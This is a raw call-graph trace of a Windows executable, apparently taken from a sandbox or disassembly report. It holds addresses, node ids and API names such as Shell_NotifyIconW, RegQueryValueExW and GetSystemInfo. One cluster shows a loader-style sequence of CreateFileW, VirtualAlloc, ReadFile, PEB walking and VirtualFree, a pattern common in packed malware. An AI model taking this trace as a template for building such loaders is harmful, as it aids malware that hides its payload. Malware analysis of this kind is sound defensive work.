625027 _memset 93251->93252 93407 624c30 93252->93407 93255 6250ac 93257 693d28 Shell_NotifyIconW 93255->93257 93258 6250ca Shell_NotifyIconW 93255->93258 93259 6251af 50 API calls 93258->93259 93260 6250df 93259->93260 93260->93233 93261->93232 93262->93233 93263->93218 93265 6252a2 Mailbox 93264->93265 93266 6251cb 93264->93266 93265->93243 93286 626b0f 93266->93286 93269 6251e6 93291 626a63 93269->93291 93270 693ca1 LoadStringW 93273 693cbb 93270->93273 93272 6251fb 93272->93273 93274 62520c 93272->93274 93275 62510d 48 API calls 93273->93275 93276 625216 93274->93276 93277 6252a7 93274->93277 93280 693cc5 93275->93280 93302 62510d 93276->93302 93311 626eed 93277->93311 93283 625220 _memset _wcscpy 93280->93283 93315 62518c 93280->93315 93282 693ce7 93285 62518c 48 API calls 93282->93285 93284 625288 Shell_NotifyIconW 93283->93284 93284->93265 93285->93283 93325 63f4ea 93286->93325 93288 626b34 93334 626b4a 93288->93334 93292 626adf 93291->93292 93295 626a6f __NMSG_WRITE 93291->93295 93369 62b18b 93292->93369 93294 626ab6 _memcpy_s 93294->93272 93296 626ad7 93295->93296 93297 626a8b 93295->93297 93368 62c369 48 API calls 93296->93368 93299 626b4a 48 API calls 93297->93299 93300 626a95 93299->93300 93359 63ee75 93300->93359 93303 62511f 93302->93303 93304 691be7 93302->93304 93381 62b384 93303->93381 93390 65a58f 48 API calls _memcpy_s 93304->93390 93307 62512b 93307->93283 93308 691bf1 93309 626eed 48 API calls 93308->93309 93310 691bf9 Mailbox 93309->93310 93312 626f00 93311->93312 93313 626ef8 93311->93313 93312->93283 93396 62dd47 48 API calls _memcpy_s 93313->93396 93316 625197 93315->93316 93317 691ace 93316->93317 93318 62519f 93316->93318 93320 626b4a 48 API calls 93317->93320 93397 625130 93318->93397 93322 691adb __NMSG_WRITE 93320->93322 93321 6251aa 93321->93282 93323 63ee75 48 API calls 93322->93323 93324 691b07 _memcpy_s 93323->93324 93327 63f4f2 __calloc_impl 93325->93327 93328 63f50c 93327->93328 93329 63f50e std::exception::exception 93327->93329 93337 64395c 93327->93337 93328->93288 93351 646805 RaiseException 93329->93351 93331 63f538 93352 64673b 47 API calls _free 93331->93352 93333 63f54a 93333->93288 93335 63f4ea 48 API calls 93334->93335 93336 6251d9 93335->93336 93336->93269 93336->93270 93338 6439d7 __calloc_impl 93337->93338 93347 643968 __calloc_impl 93337->93347 93358 647c0e 47 API calls __getptd_noexit 93338->93358 93341 64399b RtlAllocateHeap 93342 6439cf 93341->93342 93341->93347 93342->93327 93344 6439c3 93356 647c0e 47 API calls __getptd_noexit 93344->93356 93347->93341 93347->93344 93348 6439c1 93347->93348 93349 643973 93347->93349 93357 647c0e 47 API calls __getptd_noexit 93348->93357 93349->93347 93353 6481c2 47 API calls __NMSG_WRITE 93349->93353 93354 64821f 47 API calls 5 library calls 93349->93354 93355 641145 GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 93349->93355 93351->93331 93352->93333 93353->93349 93354->93349 93356->93348 93357->93342 93358->93342 93361 63f4ea __calloc_impl 93359->93361 93360 64395c std::exception::_Copy_str 47 API calls 93360->93361 93361->93360 93362 63f50c 93361->93362 93363 63f50e std::exception::exception 93361->93363 93362->93294 93373 646805 RaiseException 93363->93373 93365 63f538 93374 64673b 47 API calls _free 93365->93374 93367 63f54a 93367->93294 93368->93294 93370 62b199 93369->93370 93372 62b1a2 _memcpy_s 93369->93372 93370->93372 93375 62bdfa 93370->93375 93372->93294 93373->93365 93374->93367 93376 62be0d 93375->93376 93380 62be0a _memcpy_s 93375->93380 93377 63f4ea 48 API calls 93376->93377 93378 62be17 93377->93378 93379 63ee75 48 API calls 93378->93379 93379->93380 93380->93372 93382 62b392 93381->93382 93389 62b3c5 _memcpy_s 93381->93389 93383 62b3b8 93382->93383 93384 62b3fd 93382->93384 93382->93389 93391 62bb85 93383->93391 93386 63f4ea 48 API calls 93384->93386 93387 62b407 93386->93387 93388 63f4ea 48 API calls 93387->93388 93388->93389 93389->93307 93390->93308 93392 62bb9b 93391->93392 93394 62bb96 _memcpy_s 93391->93394 93393 63ee75 48 API calls 93392->93393 93395 691b77 93392->93395 93393->93394 93394->93389 93395->93395 93396->93312 93398 62513f __NMSG_WRITE 93397->93398 93399 625151 93398->93399 93400 691b27 93398->93400 93402 62bb85 48 API calls 93399->93402 93401 626b4a 48 API calls 93400->93401 93403 691b34 93401->93403 93404 62515e _memcpy_s 93402->93404 93405 63ee75 48 API calls 93403->93405 93404->93321 93406 691b57 _memcpy_s 93405->93406 93408 624c44 93407->93408 93409 693c33 93407->93409 93408->93255 93411 665819 61 API calls _W_store_winword 93408->93411 93409->93408 93410 693c3c DestroyIcon 93409->93410 93410->93408 93411->93255 93412 698eb8 93416 66a635 93412->93416 93414 698ec3 93415 66a635 84 API calls 93414->93415 93415->93414 93421 66a642 93416->93421 93422 66a66f 93416->93422 93417 66a671 93448 63ec4e 81 API calls 93417->93448 93418 66a676 93427 62936c 93418->93427 93421->93417 93421->93418 93421->93422 93425 66a669 93421->93425 93422->93414 93423 66a67d 93424 62510d 48 API calls 93423->93424 93424->93422 93447 634525 61 API calls _memcpy_s 93425->93447 93428 629384 93427->93428 93440 629380 93427->93440 93429 694cbd __i64tow 93428->93429 93430 694bbf 93428->93430 93431 629398 93428->93431 93439 6293b0 __itow Mailbox _wcscpy 93428->93439 93432 694bc8 93430->93432 93433 694ca5 93430->93433 93449 64172b 80 API calls 4 library calls 93431->93449 93438 694be7 93432->93438 93432->93439 93456 64172b 80 API calls 4 library calls 93433->93456 93436 63f4ea 48 API calls 93437 6293ba 93436->93437 93437->93440 93450 62ce19 93437->93450 93441 63f4ea 48 API calls 93438->93441 93439->93436 93440->93423 93443 694c04 93441->93443 93444 63f4ea 48 API calls 93443->93444 93445 694c2a 93444->93445 93445->93440 93446 62ce19 48 API calls 93445->93446 93446->93440 93447->93422 93448->93418 93449->93439 93451 62ce28 __NMSG_WRITE 93450->93451 93452 63ee75 48 API calls 93451->93452 93453 62ce50 _memcpy_s 93452->93453 93454 63f4ea 48 API calls 93453->93454 93455 62ce66 93454->93455 93455->93440 93456->93439 93457 69197b 93462 63dd94 93457->93462 93461 69198a 93463 63f4ea 48 API calls 93462->93463 93464 63dd9c 93463->93464 93465 63ddb0 93464->93465 93470 63df3d 93464->93470 93469 640f0a 52 API calls __cinit 93465->93469 93469->93461 93471 63df46 93470->93471 93472 63dda8 93470->93472 93502 640f0a 52 API calls __cinit 93471->93502 93474 63ddc0 93472->93474 93503 62d7f7 93474->93503 93477 626a63 48 API calls 93478 63de1a 93477->93478 93508 63dfb4 93478->93508 93483 6924c8 93485 63dea4 GetCurrentProcess 93525 63df5f LoadLibraryA GetProcAddress 93485->93525 93488 63dee3 93519 63e00c 93488->93519 93489 63df31 GetSystemInfo 93491 63df0e 93489->93491 93490 63debb 93490->93488 93490->93489 93493 63df21 93491->93493 93494 63df1c FreeLibrary 93491->93494 93493->93465 93494->93493 93496 63df29 GetSystemInfo 93498 63df03 93496->93498 93497 63def9 93522 63dff4 93497->93522 93498->93491 93501 63df09 FreeLibrary 93498->93501 93501->93491 93502->93472 93504 63f4ea 48 API calls 93503->93504 93505 62d818 93504->93505 93506 63f4ea 48 API calls 93505->93506 93507 62d826 GetVersionExW 93506->93507 93507->93477 93509 63dfbd 93508->93509 93510 62b18b 48 API calls 93509->93510 93511 63de22 93510->93511 93512 626571 93511->93512 93513 62657f 93512->93513 93514 62b18b 48 API calls 93513->93514 93515 62658f 93514->93515 93515->93483 93516 63df77 93515->93516 93526 63df89 93516->93526 93530 63e01e 93519->93530 93523 63e00c 2 API calls 93522->93523 93524 63df01 GetNativeSystemInfo 93523->93524 93524->93498 93525->93490 93527 63dea0 93526->93527 93528 63df92 LoadLibraryA 93526->93528 93527->93485 93527->93490 93528->93527 93529 63dfa3 GetProcAddress 93528->93529 93529->93527 93531 63def1 93530->93531 93532 63e027 LoadLibraryA 93530->93532 93531->93496 93531->93497 93532->93531 93533 63e038 GetProcAddress 93532->93533 93533->93531 93534 6919cb 93539 622322 93534->93539 93536 6919d1 93572 640f0a 52 API calls __cinit 93536->93572 93538 6919db 93540 622344 93539->93540 93573 6226df 93540->93573 93545 62d7f7 48 API calls 93546 622384 93545->93546 93547 62d7f7 48 API calls 93546->93547 93548 62238e 93547->93548 93549 62d7f7 48 API calls 93548->93549 93550 622398 93549->93550 93551 62d7f7 48 API calls 93550->93551 93552 6223de 93551->93552 93553 62d7f7 48 API calls 93552->93553 93554 6224c1 93553->93554 93581 62263f 93554->93581 93558 6224f1 93559 62d7f7 48 API calls 93558->93559 93560 6224fb 93559->93560 93610 622745 93560->93610 93562 622546 93563 622556 GetStdHandle 93562->93563 93564 6225b1 93563->93564 93565 69501d 93563->93565 93566 6225b7 CoInitialize 93564->93566 93565->93564 93567 695026 93565->93567 93566->93536 93617 6692d4 53 API calls 93567->93617 93569 69502d 93618 6699f9 CreateThread 93569->93618 93571 695039 CloseHandle 93571->93566 93572->93538 93619 622854 93573->93619 93576 626a63 48 API calls 93577 62234a 93576->93577 93578 62272e 93577->93578 93633 6227ec 6 API calls 93578->93633 93580 62237a 93580->93545 93582 62d7f7 48 API calls 93581->93582 93583 62264f 93582->93583 93584 62d7f7 48 API calls 93583->93584 93585 622657 93584->93585 93634 6226a7 93585->93634 93588 6226a7 48 API calls 93589 622667 93588->93589 93590 62d7f7 48 API calls 93589->93590 93591 622672 93590->93591 93592 63f4ea 48 API calls 93591->93592 93593 6224cb 93592->93593 93594 6222a4 93593->93594 93595 6222b2 93594->93595 93596 62d7f7 48 API calls 93595->93596 93597 6222bd 93596->93597 93598 62d7f7 48 API calls 93597->93598 93599 6222c8 93598->93599 93600 62d7f7 48 API calls 93599->93600 93601 6222d3 93600->93601 93602 62d7f7 48 API calls 93601->93602 93603 6222de 93602->93603 93604 6226a7 48 API calls 93603->93604 93605 6222e9 93604->93605 93606 63f4ea 48 API calls 93605->93606 93607 6222f0 93606->93607 93608 6222f9 RegisterWindowMessageW 93607->93608 93609 691fe7 93607->93609 93608->93558 93611 695f4d 93610->93611 93612 622755 93610->93612 93639 66c942 50 API calls 93611->93639 93613 63f4ea 48 API calls 93612->93613 93616 62275d 93613->93616 93615 695f58 93616->93562 93617->93569 93618->93571 93640 6699df 54 API calls 93618->93640 93626 622870 93619->93626 93622 622870 48 API calls 93623 622864 93622->93623 93624 62d7f7 48 API calls 93623->93624 93625 622716 93624->93625 93625->93576 93627 62d7f7 48 API calls 93626->93627 93628 62287b 93627->93628 93629 62d7f7 48 API calls 93628->93629 93630 622883 93629->93630 93631 62d7f7 48 API calls 93630->93631 93632 62285c 93631->93632 93632->93622 93633->93580 93635 62d7f7 48 API calls 93634->93635 93636 6226b0 93635->93636 93637 62d7f7 48 API calls 93636->93637 93638 62265f 93637->93638 93638->93588 93639->93615 93641 6919ba 93646 63c75a 93641->93646 93645 6919c9 93647 62d7f7 48 API calls 93646->93647 93648 63c7c8 93647->93648 93654 63d26c 93648->93654 93651 63c865 93652 63c881 93651->93652 93657 63d1fa 48 API calls _memcpy_s 93651->93657 93653 640f0a 52 API calls __cinit 93652->93653 93653->93645 93658 63d298 93654->93658 93657->93651 93659 63d28b 93658->93659 93660 63d2a5 93658->93660 93659->93651 93660->93659 93661 63d2ac RegOpenKeyExW 93660->93661 93661->93659 93662 63d2c6 RegQueryValueExW 93661->93662 93663 63d2fc RegCloseKey 93662->93663 93664 63d2e7 93662->93664 93663->93659 93664->93663 93665 6919dd 93670 624a30 93665->93670 93667 6919f1 93690 640f0a 52 API calls __cinit 93667->93690 93669 6919fb 93671 624a40 __ftell_nolock 93670->93671 93672 62d7f7 48 API calls 93671->93672 93673 624af6 93672->93673 93691 625374 93673->93691 93675 624aff 93698 62363c 93675->93698 93678 62518c 48 API calls 93679 624b18 93678->93679 93704 6264cf 93679->93704 93682 62d7f7 48 API calls 93683 624b32 93682->93683 93710 6249fb 93683->93710 93685 624b3d _wcscat Mailbox __NMSG_WRITE 93686 624b43 Mailbox 93685->93686 93687 6261a6 48 API calls 93685->93687 93688 62ce19 48 API calls 93685->93688 93689 6264cf 48 API calls 93685->93689 93686->93667 93687->93685 93688->93685 93689->93685 93690->93669 93724 64f8a0 93691->93724 93694 62ce19 48 API calls 93695 6253a7 93694->93695 93726 62660f 93695->93726 93697 6253b1 Mailbox 93697->93675 93699 623649 __ftell_nolock 93698->93699 93733 62366c GetFullPathNameW 93699->93733 93701 62365a 93702 626a63 48 API calls 93701->93702 93703 623669 93702->93703 93703->93678 93705 62651b 93704->93705 93709 6264dd _memcpy_s 93704->93709 93708 63f4ea 48 API calls 93705->93708 93706 63f4ea 48 API calls 93707 624b29 93706->93707 93707->93682 93708->93709 93709->93706 93735 62bcce 93710->93735 93713 6941cc RegQueryValueExW 93715 6941e5 93713->93715 93716 694246 RegCloseKey 93713->93716 93714 624a2b 93714->93685 93717 63f4ea 48 API calls 93715->93717 93718 6941fe 93717->93718 93741 6247b7 93718->93741 93721 69423b 93721->93716 93722 694224 93723 626a63 48 API calls 93722->93723 93723->93721 93725 625381 GetModuleFileNameW 93724->93725 93725->93694 93727 64f8a0 __ftell_nolock 93726->93727 93728 62661c GetFullPathNameW 93727->93728 93729 626a63 48 API calls 93728->93729 93730 626643 93729->93730 93731 626571 48 API calls 93730->93731 93732 62664f 93731->93732 93732->93697 93734 62368a 93733->93734 93734->93701 93736 624a0a RegOpenKeyExW 93735->93736 93737 62bce8 93735->93737 93736->93713 93736->93714 93738 63f4ea 48 API calls 93737->93738 93739 62bcf2 93738->93739 93740 63ee75 48 API calls 93739->93740 93740->93736 93742 63f4ea 48 API calls 93741->93742 93743 6247c9 RegQueryValueExW 93742->93743 93743->93721 93743->93722 93744 699bec 93747 630ae0 _memcpy_s Mailbox 93744->93747 93746 631526 Mailbox 93852 66cc5c 86 API calls 4 library calls 93746->93852 93747->93746 93755 62ffe1 Mailbox 93747->93755 93770 62ce19 48 API calls 93747->93770 93776 62fec8 93747->93776 93779 63f4ea 48 API calls 93747->93779 93781 69a706 93747->93781 93783 6597ed InterlockedDecrement 93747->93783 93801 676ff0 93747->93801 93810 680d1d 93747->93810 93813 680d09 93747->93813 93817 62fe30 93747->93817 93846 67ef61 82 API calls 2 library calls 93747->93846 93847 67f0ac 90 API calls Mailbox 93747->93847 93848 66a6ef 48 API calls 93747->93848 93849 67e822 335 API calls Mailbox 93747->93849 93750 63146e 93758 626eed 48 API calls 93750->93758 93753 63f4ea 48 API calls 93753->93776 93756 69a922 93757 631473 93854 66cc5c 86 API calls 4 library calls 93757->93854 93758->93755 93760 630509 93855 66cc5c 86 API calls 4 library calls 93760->93855 93761 69a246 93765 626eed 48 API calls 93761->93765 93764 626eed 48 API calls 93764->93776 93765->93755 93766 69a873 93767 69a30e 93767->93755 93850 6597ed InterlockedDecrement 93767->93850 93768 6597ed InterlockedDecrement 93768->93776 93769 62d7f7 48 API calls 93769->93776 93770->93747 93772 640f0a 52 API calls __cinit 93772->93776 93773 69a973 93856 66cc5c 86 API calls 4 library calls 93773->93856 93775 69a982 93776->93750 93776->93753 93776->93755 93776->93757 93776->93760 93776->93761 93776->93764 93776->93767 93776->93768 93776->93769 93776->93772 93776->93773 93778 6315b5 93776->93778 93787 631d10 93776->93787 93816 631820 335 API calls 2 library calls 93776->93816 93853 66cc5c 86 API calls 4 library calls 93778->93853 93779->93747 93851 66cc5c 86 API calls 4 library calls 93781->93851 93783->93747 93788 631d2a 93787->93788 93793 631ed6 93787->93793 93790 632357 93788->93790 93788->93793 93794 631e0b 93788->93794 93795 631eba 93788->93795 93789 631e9a Mailbox 93789->93795 93859 64203b 58 API calls __wtof_l 93789->93859 93790->93795 93860 669f44 58 API calls wcstoxq 93790->93860 93792 631e47 93792->93789 93792->93795 93798 69bfc4 93792->93798 93793->93789 93793->93790 93793->93795 93797 631f55 93793->93797 93794->93792 93794->93795 93794->93797 93795->93776 93795->93795 93797->93789 93797->93795 93858 6597ed InterlockedDecrement 93797->93858 93857 64203b 58 API calls __wtof_l 93798->93857 93802 62936c 81 API calls 93801->93802 93803 67702a 93802->93803 93861 62b470 93803->93861 93805 67703a 93806 67705f 93805->93806 93807 62fe30 335 API calls 93805->93807 93809 677063 93806->93809 93889 62cdb9 48 API calls 93806->93889 93807->93806 93809->93747 93905 67f8ae 93810->93905 93812 680d2d 93812->93747 93814 67f8ae 129 API calls 93813->93814 93815 680d19 93814->93815 93815->93747 93816->93776 93818 62fe50 93817->93818 93842 62fe7e 93817->93842 93819 63f4ea 48 API calls 93818->93819 93819->93842 93820 63146e 93821 626eed 48 API calls 93820->93821 93844 62ffe1 93821->93844 93822 62d7f7 48 API calls 93822->93842 93823 631d10 59 API calls 93823->93842 93825 630509 94026 66cc5c 86 API calls 4 library calls 93825->94026 93826 63f4ea 48 API calls 93826->93842 93828 69a922 93828->93747 93829 631473 94025 66cc5c 86 API calls 4 library calls 93829->94025 93830 69a246 93834 626eed 48 API calls 93830->93834 93833 626eed 48 API calls 93833->93842 93834->93844 93835 69a873 93835->93747 93836 69a30e 93836->93844 94023 6597ed InterlockedDecrement 93836->94023 93837 640f0a 52 API calls __cinit 93837->93842 93839 6597ed InterlockedDecrement 93839->93842 93840 69a973 94027 66cc5c 86 API calls 4 library calls 93840->94027 93842->93820 93842->93822 93842->93823 93842->93825 93842->93826 93842->93829 93842->93830 93842->93833 93842->93836 93842->93837 93842->93839 93842->93840 93842->93844 93845 6315b5 93842->93845 94022 631820 335 API calls 2 library calls 93842->94022 93843 69a982 93844->93747 94024 66cc5c 86 API calls 4 library calls 93845->94024 93846->93747 93847->93747 93848->93747 93849->93747 93850->93755 93851->93746 93852->93755 93853->93755 93854->93766 93855->93756 93856->93775 93857->93795 93858->93789 93859->93795 93860->93795 93862 626b0f 48 API calls 93861->93862 93873 62b495 93862->93873 93863 62b69b 93892 62ba85 93863->93892 93865 62b6b5 Mailbox 93865->93805 93868 693939 _memcpy_s 93902 6626bc 88 API calls 4 library calls 93868->93902 93869 69397b 93903 6626bc 88 API calls 4 library calls 93869->93903 93870 62ba85 48 API calls 93870->93873 93873->93863 93873->93868 93873->93869 93873->93870 93878 62bcce 48 API calls 93873->93878 93880 62b9e4 93873->93880 93881 693909 93873->93881 93882 62bb85 48 API calls 93873->93882 93886 62bdfa 48 API calls 93873->93886 93890 62c413 59 API calls 93873->93890 93891 62bc74 48 API calls 93873->93891 93900 62c6a5 49 API calls 93873->93900 93901 62c799 48 API calls _memcpy_s 93873->93901 93875 693973 93875->93865 93877 693989 93879 62ba85 48 API calls 93877->93879 93878->93873 93879->93875 93904 6626bc 88 API calls 4 library calls 93880->93904 93883 626b4a 48 API calls 93881->93883 93882->93873 93885 693914 93883->93885 93888 63f4ea 48 API calls 93885->93888 93887 62b66c CharUpperBuffW 93886->93887 93887->93873 93888->93868 93889->93809 93890->93873 93891->93873 93893 62bb25 93892->93893 93896 62ba98 _memcpy_s 93892->93896 93895 63f4ea 48 API calls 93893->93895 93894 63f4ea 48 API calls 93898 62ba9f 93894->93898 93895->93896 93896->93894 93897 62bac8 93897->93865 93898->93897 93899 63f4ea 48 API calls 93898->93899 93899->93897 93900->93873 93901->93873 93902->93875 93903->93877 93904->93875 93906 62936c 81 API calls 93905->93906 93907 67f8ea 93906->93907 93909 67f92c Mailbox 93907->93909 93941 680567 93907->93941 93909->93812 93910 67fb8b 93911 67fcfa 93910->93911 93913 67fb95 93910->93913 94004 680688 89 API calls Mailbox 93911->94004 93954 67f70a 93913->93954 93915 67fd07 93915->93913 93916 67fd13 93915->93916 93916->93909 93917 62936c 81 API calls 93934 67f984 Mailbox 93917->93934 93922 67fbc9 93968 63ed18 93922->93968 93925 67fbe3 93974 66cc5c 86 API calls 4 library calls 93925->93974 93926 67fbfd 93975 63c050 93926->93975 93929 67fbee GetCurrentProcess TerminateProcess 93929->93926 93930 67fc14 93940 67fc3e 93930->93940 93986 631b90 93930->93986 93932 67fd65 93932->93909 93937 67fd7e FreeLibrary 93932->93937 93933 67fc2d 94002 68040f 105 API calls _free 93933->94002 93934->93909 93934->93910 93934->93917 93934->93934 93972 6829e8 48 API calls _memcpy_s 93934->93972 93973 67fda5 60 API calls 2 library calls 93934->93973 93936 631b90 48 API calls 93936->93940 93937->93909 93940->93932 93940->93936 94003 62dcae 50 API calls Mailbox 93940->94003 94005 68040f 105 API calls _free 93940->94005 93942 62bdfa 48 API calls 93941->93942 93943 680582 CharLowerBuffW 93942->93943 94006 661f11 93943->94006 93947 62d7f7 48 API calls 93948 6805bb 93947->93948 94013 6269e9 48 API calls _memcpy_s 93948->94013 93950 6805d2 93951 62b18b 48 API calls 93950->93951 93952 6805de Mailbox 93951->93952 93953 68061a Mailbox 93952->93953 94014 67fda5 60 API calls 2 library calls 93952->94014 93953->93934 93955 67f725 93954->93955 93959 67f77a 93954->93959 93956 63f4ea 48 API calls 93955->93956 93957 67f747 93956->93957 93958 63f4ea 48 API calls 93957->93958 93957->93959 93958->93957 93960 680828 93959->93960 93961 680a53 Mailbox 93960->93961 93967 68084b _strcat _wcscpy __NMSG_WRITE 93960->93967 93961->93922 93962 62cf93 58 API calls 93962->93967 93963 62d286 48 API calls 93963->93967 93964 62936c 81 API calls 93964->93967 93965 64395c 47 API calls std::exception::_Copy_str 93965->93967 93967->93961 93967->93962 93967->93963 93967->93964 93967->93965 94017 668035 50 API calls __NMSG_WRITE 93967->94017 93970 63ed2d 93968->93970 93969 63edc5 VirtualProtect 93971 63ed93 93969->93971 93970->93969 93970->93971 93971->93925 93971->93926 93972->93934 93973->93934 93974->93929 93976 63c064 93975->93976 93978 63c069 Mailbox 93975->93978 94018 63c1af 48 API calls 93976->94018 93984 63c077 93978->93984 94019 63c15c 48 API calls 93978->94019 93980 63f4ea 48 API calls 93982 63c108 93980->93982 93981 63c152 93981->93930 93983 63f4ea 48 API calls 93982->93983 93985 63c113 93983->93985 93984->93980 93984->93981 93985->93930 93987 631cf6 93986->93987 93989 631ba2 93986->93989 93987->93933 93988 631bae 93993 631bb9 93988->93993 94021 63c15c 48 API calls 93988->94021 93989->93988 93991 63f4ea 48 API calls 93989->93991 93992 6949c4 93991->93992 93995 63f4ea 48 API calls 93992->93995 93994 631c5d 93993->93994 93996 63f4ea 48 API calls 93993->93996 93994->93933 94001 6949cf 93995->94001 93997 631c9f 93996->93997 93998 631cb2 93997->93998 94020 622925 48 API calls 93997->94020 93998->93933 94000 63f4ea 48 API calls 94000->94001 94001->93988 94001->94000 94002->93940 94003->93940 94004->93915 94005->93940 94008 661f3b __NMSG_WRITE 94006->94008 94007 661f79 94007->93947 94007->93952 94008->94007 94009 661ffa 94008->94009 94010 661f6f 94008->94010 94009->94007 94016 63d37a 60 API calls 94009->94016 94010->94007 94015 63d37a 60 API calls 94010->94015 94013->93950 94014->93953 94015->94010 94016->94009 94017->93967 94018->93978 94019->93984 94020->93998 94021->93993 94022->93842 94023->93844 94024->93844 94025->93835 94026->93828 94027->93843 94028 14df2db 94029 14df2e2 94028->94029 94030 14df2ea 94029->94030 94031 14df380 94029->94031 94035 14def90 94030->94035 94048 14dfc30 9 API calls 94031->94048 94034 14df367 94049 14dc980 94035->94049 94038 14df060 CreateFileW 94039 14df02f 94038->94039 94042 14df06d 94038->94042 94040 14df089 VirtualAlloc 94039->94040 94039->94042 94046 14df190 CloseHandle 94039->94046 94047 14df1a0 VirtualFree 94039->94047 94052 14dfea0 GetPEB 94039->94052 94041 14df0aa ReadFile 94040->94041 94040->94042 94041->94042 94043 14df0c8 VirtualAlloc 94041->94043 94044 14df27c VirtualFree 94042->94044 94045 14df28a 94042->94045 94043->94039 94043->94042 94044->94045 94045->94034 94046->94039 94047->94039 94048->94034 94051 14dd00b 94049->94051 94054 14dfe40 GetPEB 94049->94054 94051->94039 94053 14dfeca 94052->94053 94053->94038 94054->94051 94055 63221a 94056 63271e 94055->94056 94057 632223 94055->94057 94064 631eba Mailbox 94056->94064 94066 65a58f 48 API calls _memcpy_s 94056->94066 94057->94056 94058 62936c 81 API calls 94057->94058 94059 63224e 94058->94059 94059->94056 94060 63225e 94059->94060 94062 62b384 48 API calls 94060->94062 94062->94064 94063 69be8a 94065 626eed 48 API calls 94063->94065 94065->94064 94066->94063 94067 645dfd 94068 645e09 _flsall 94067->94068 94104 647eeb GetStartupInfoW 94068->94104 94071 645e0e 94106 649ca7 GetProcessHeap 94071->94106 94072 645e66 94073 645e71 94072->94073 94191 645f4d 47 API calls 3 library calls 94072->94191 94107 647b47 94073->94107 94076 645e77 94077 645e82 __RTC_Initialize 94076->94077 94192 645f4d 47 API calls 3 library calls 94076->94192 94128 64acb3 94077->94128 94080 645e91 94081 645e9d GetCommandLineW 94080->94081 94193 645f4d 47 API calls 3 library calls 94080->94193 94147 652e7d GetEnvironmentStringsW 94081->94147 94084 645e9c 94084->94081 94088 645ec2 94160 652cb4 94088->94160 94091 645ec8 94094 645ed3 94091->94094 94195 64115b 47 API calls 3 library calls 94091->94195 94174 641195 94094->94174 94095 645edb 94096 645ee6 __wwincmdln 94095->94096 94196 64115b 47 API calls 3 library calls 94095->94196 94178 623a0f 94096->94178 94099 645efa 94100 645f09 94099->94100 94197 6413f1 47 API calls _doexit 94099->94197 94198 641186 47 API calls _doexit 94100->94198 94103 645f0e _flsall 94105 647f01 94104->94105 94105->94071 94106->94072 94199 64123a 30 API calls 2 library calls 94107->94199 94109 647b4c 94200 647e23 InitializeCriticalSectionAndSpinCount 94109->94200 94111 647b51 94112 647b55 94111->94112 94202 647e6d TlsAlloc 94111->94202 94201 647bbd 50 API calls 2 library calls 94112->94201 94115 647b67 94115->94112 94117 647b72 94115->94117 94116 647b5a 94116->94076 94203 646986 94117->94203 94120 647bb4 94211 647bbd 50 API calls 2 library calls 94120->94211 94123 647b93 94123->94120 94125 647b99 94123->94125 94124 647bb9 94124->94076 94210 647a94 47 API calls 4 library calls 94125->94210 94127 647ba1 GetCurrentThreadId 94127->94076 94129 64acbf _flsall 94128->94129 94220 647cf4 94129->94220 94131 64acc6 94132 646986 __calloc_crt 47 API calls 94131->94132 94133 64acd7 94132->94133 94134 64ad42 GetStartupInfoW 94133->94134 94135 64ace2 _flsall @_EH4_CallFilterFunc@8 94133->94135 94139 64ad57 94134->94139 94143 64ae80 94134->94143 94135->94080 94136 64af44 94227 64af58 LeaveCriticalSection _doexit 94136->94227 94138 64ada5 94138->94143 94145 64ade5 InitializeCriticalSectionAndSpinCount 94138->94145 94146 64add7 GetFileType 94138->94146 94139->94138 94141 646986 __calloc_crt 47 API calls 94139->94141 94139->94143 94140 64aec9 GetStdHandle 94140->94143 94141->94139 94142 64aedb GetFileType 94142->94143 94143->94136 94143->94140 94143->94142 94144 64af08 InitializeCriticalSectionAndSpinCount 94143->94144 94144->94143 94145->94138 94146->94138 94146->94145 94148 645ead 94147->94148 94149 652e8e 94147->94149 94154 652a7b GetModuleFileNameW 94148->94154 94266 6469d0 47 API calls std::exception::_Copy_str 94149->94266 94152 652eb4 _memcpy_s 94153 652eca FreeEnvironmentStringsW 94152->94153 94153->94148 94155 652aaf _wparse_cmdline 94154->94155 94156 645eb7 94155->94156 94157 652ae9 94155->94157 94156->94088 94194 64115b 47 API calls 3 library calls 94156->94194 94267 6469d0 47 API calls std::exception::_Copy_str 94157->94267 94159 652aef _wparse_cmdline 94159->94156 94161 652ccd __NMSG_WRITE 94160->94161 94165 652cc5 94160->94165 94162 646986 __calloc_crt 47 API calls 94161->94162 94170 652cf6 __NMSG_WRITE 94162->94170 94163 652d4d 94164 641c9d _free 47 API calls 94163->94164 94164->94165 94165->94091 94166 646986 __calloc_crt 47 API calls 94166->94170 94167 652d72 94168 641c9d _free 47 API calls 94167->94168 94168->94165 94170->94163 94170->94165 94170->94166 94170->94167 94171 652d89 94170->94171 94268 652567 47 API calls 2 library calls 94170->94268 94269 646e20 IsProcessorFeaturePresent 94171->94269 94173 652d95 94173->94091 94175 6411a1 __initterm_e __initp_misc_cfltcvt_tab __IsNonwritableInCurrentImage 94174->94175 94177 6411e0 __IsNonwritableInCurrentImage 94175->94177 94292 640f0a 52 API calls __cinit 94175->94292 94177->94095 94179 691ebf 94178->94179 94180 623a29 94178->94180 94181 623a63 IsThemeActive 94180->94181 94293 641405 94181->94293 94185 623a8f 94305 623adb SystemParametersInfoW SystemParametersInfoW 94185->94305 94187 623a9b 94306 623d19 94187->94306 94189 623aa3 SystemParametersInfoW 94190 623ac8 94189->94190 94190->94099 94191->94073 94192->94077 94193->94084 94197->94100 94198->94103 94199->94109 94200->94111 94201->94116 94202->94115 94205 64698d 94203->94205 94206 6469ca 94205->94206 94207 6469ab Sleep 94205->94207 94212 6530aa 94205->94212 94206->94120 94209 647ec9 TlsSetValue 94206->94209 94208 6469c2 94207->94208 94208->94205 94208->94206 94209->94123 94210->94127 94211->94124 94213 6530b5 94212->94213 94214 6530d0 __calloc_impl 94212->94214 94213->94214 94215 6530c1 94213->94215 94216 6530e0 RtlAllocateHeap 94214->94216 94218 6530c6 94214->94218 94219 647c0e 47 API calls __getptd_noexit 94215->94219 94216->94214 94216->94218 94218->94205 94219->94218 94221 647d05 94220->94221 94222 647d18 EnterCriticalSection 94220->94222 94228 647d7c 94221->94228 94222->94131 94224 647d0b 94224->94222 94252 64115b 47 API calls 3 library calls 94224->94252 94227->94135 94229 647d88 _flsall 94228->94229 94230 647d91 94229->94230 94231 647da9 94229->94231 94253 6481c2 47 API calls __NMSG_WRITE 94230->94253 94237 647e11 _flsall 94231->94237 94246 647da7 94231->94246 94234 647d96 94254 64821f 47 API calls 5 library calls 94234->94254 94235 647dbd 94238 647dc4 94235->94238 94239 647dd3 94235->94239 94237->94224 94257 647c0e 47 API calls 